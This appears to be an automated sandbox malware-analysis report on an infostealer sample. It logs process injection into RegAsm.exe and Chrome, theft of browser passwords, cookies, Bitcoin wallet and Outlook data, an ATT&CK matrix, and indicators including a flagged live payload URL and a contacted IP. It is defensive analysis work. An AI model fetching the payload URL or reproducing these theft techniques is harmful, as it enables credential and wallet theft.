                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 32910000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 365E0000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 31310000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: C3D0000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 329F0000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: F2A0000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2D570000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 3D370000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 366C0000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 313F0000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: C4B0000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 32AD0000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: F380000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2D650000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 790000Jump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 792000Jump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EE000Jump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7F0000Jump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40C008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 32910000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 910000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 365E0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 5E0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 31310000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 310000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: C3D0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 3D0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 329F0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 920000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: F2A0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2A0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2D570000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 570000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 3D370000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 370000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 366C0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 5F0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 313F0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 320000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: C4B0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 3E0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 32AD0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 930000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: F380000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2B0000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 2D650000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 580000Jump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeQueries volume information: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\nEnq-0023HHHDDJKSS1000025.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Tries to harvest and steal Bitcoin Wallet information
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts41
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		1
                    Extra Window Memory Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory134
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
                    Process Injection                    		1
                    Obfuscated Files or Information                    		Security Account Manager231
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Scheduled Task/Job                    		2
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model1
                    Clipboard Data                    		3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets51
                    Virtualization/Sandbox Evasion                    		SSHKeylogging4
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Extra Window Memory Injection                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job51
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1689536 Sample: nEnq-0023HHHDDJKSS1000025.pif.exe Startdate: 14/05/2025 Architecture: WINDOWS Score: 100 31 www.new.eventawardsrussia.com 2->31 43 Suricata IDS alerts for network traffic 2->43 45 Antivirus detection for URL or domain 2->45 47 Multi AV Scanner detection for submitted file 2->47 49 5 other signatures 2->49 9 nEnq-0023HHHDDJKSS1000025.pif.exe 15 2 2->9         started        signatures3 process4 dnsIp5 33 www.new.eventawardsrussia.com 5.23.51.54, 443, 49714 TIMEWEB-ASRU Russian Federation 9->33 51 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->51 53 Writes to foreign memory regions 9->53 55 Injects a PE file into a foreign processes 9->55 13 RegAsm.exe 4 9->13         started        signatures6 process7 dnsIp8 41 91.92.120.101, 49722, 49755, 62520 INETLTDTR Cyprus 13->41 57 Tries to steal Mail credentials (via file / registry access) 13->57 59 Tries to harvest and steal browser information (history, passwords, etc) 13->59 61 Writes to foreign memory regions 13->61 63 4 other signatures 13->63 17 chrome.exe 6 13->17         started        20 chrome.exe 13->20 injected 22 chrome.exe 13->22 injected 24 4 other processes 13->24 signatures9 process10 dnsIp11 29 192.168.2.4, 138, 443, 49708 unknown unknown 17->29 26 chrome.exe 17->26         started        process12 dnsIp13 35 googlehosted.l.googleusercontent.com 142.250.68.225, 443, 49739, 49740 GOOGLEUS United States 26->35 37 www.google.com 142.250.68.228, 443, 49727, 49730 GOOGLEUS United States 26->37 39 5 other IPs or domains 26->39

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    nEnq-0023HHHDDJKSS1000025.pif.exe26%VirustotalBrowse
                    nEnq-0023HHHDDJKSS1000025.pif.exe24%ReversingLabs
                    SAMPLE100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://www.new.eventawardsrussia.com/wp-includes/Ypeyqku.pdf100%Avira URL Cloudmalware
                    https://www.new.eventawardsrussia.com0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ogads-pa.clients6.google.com
                    		192.178.49.170
                    		truefalse
                      		high
                      plus.l.google.com
                      		142.250.69.14
                      		truefalse
                        		high
                        play.google.com
                        		192.178.49.206
                        		truefalse
                          		high
                          www.new.eventawardsrussia.com
                          		5.23.51.54
                          		truefalse
                            		high
                            www.google.com
                            		142.250.68.228
                            		truefalse
                              		high
                              googlehosted.l.googleusercontent.com
                              		142.250.68.225
                              		truefalse
                                		high
                                clients2.googleusercontent.com
                                		unknown
                                		unknownfalse
                                  		high
                                  apis.google.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://www.new.eventawardsrussia.com/wp-includes/Ypeyqku.pdffalse
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://mail.google.com/mail/?usp=installed_webappchrome.exe, 0000000A.00000003.1655460957.0000226401D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655145696.0000226401CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655823058.0000226401D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656154943.0000226401D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654777507.0000226401CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656302765.0000226401D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655266401.0000226401CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655015493.0000226401CE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://goto.google.com/sme-bugs2echrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://gemini-dev.corp.google.comchrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://use.typekit.netchrome.exe, 0000000A.00000003.1658202414.00002264003EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1658645951.0000226400324000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/mgravell/protobuf-netJnEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1477131675.0000000006430000.00000004.08000000.00040000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com24chrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://chrome.google.com/webstore?hl=en-GBchrome.exe, 0000000F.00000003.1865777375.0000022D00040000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://gemini.google.comchrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://gemini-autopush.corp.google.comchrome.exe, 0000000A.00000003.1592865820.0000226401B30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000000A.00000003.1658102005.0000226401204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1564459571.000022640167C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1577159703.0000226401204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1591542631.00002264011E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000000.1673703016.00004DD4001EC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1735113352.00003584001EC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://web.whatsapp.com/chrome.exe, 0000000A.00000003.1655015493.0000226401CE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://lens.google.com/gen204chrome.exe, 0000000A.00000003.1563517310.0000226401444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1578924548.00002264004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1747270804.0000358400C98000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1743149719.000035840087C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://assets.adobedtm.comchrome.exe, 0000000A.00000003.1658202414.00002264003EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1658645951.0000226400324000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://mail.google.com/chat/chrome.exe, 0000000A.00000003.1655460957.0000226401D04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655145696.0000226401CE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655823058.0000226401D14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656154943.0000226401D1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1654777507.0000226401CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1656302765.0000226401D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655266401.0000226401CEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1655015493.0000226401CE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://myactivity.google.com/chrome.exe, 0000000F.00000000.1724849974.0000022D00100000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/mgravell/protobuf-netinEnq-0023HHHDDJKSS1000025.pif.exe, 00000000.00000002.1477131675.0000000006430000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://calendar.google.comchrome.exe, 0000000A.00000003.1563517310.0000226401444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1578824230.0000226401414000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1578869310.0000226401424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1578924548.00002264004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1747270804.0000358400C98000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 0000000F.00000000.1743149719.000035840087C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 0000000A.00000003.1590221542.0000226401948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590491499.000022640155C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.google.com/imghp?hl=en-GB&amp;tab=ri&amp;ogblchrome.exe, 0000000A.00000003.1590221542.0000226401948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1590491499.000022640155C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.google.com/intl/en-GB/about/products?tab=rhchrome.exe, 0000000A.00000003.1590491499.000022640155C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1576035127.00002264016F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://drive.google.com/chrome.exe, 0000000A.00000003.1655015493.0000226401CE4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
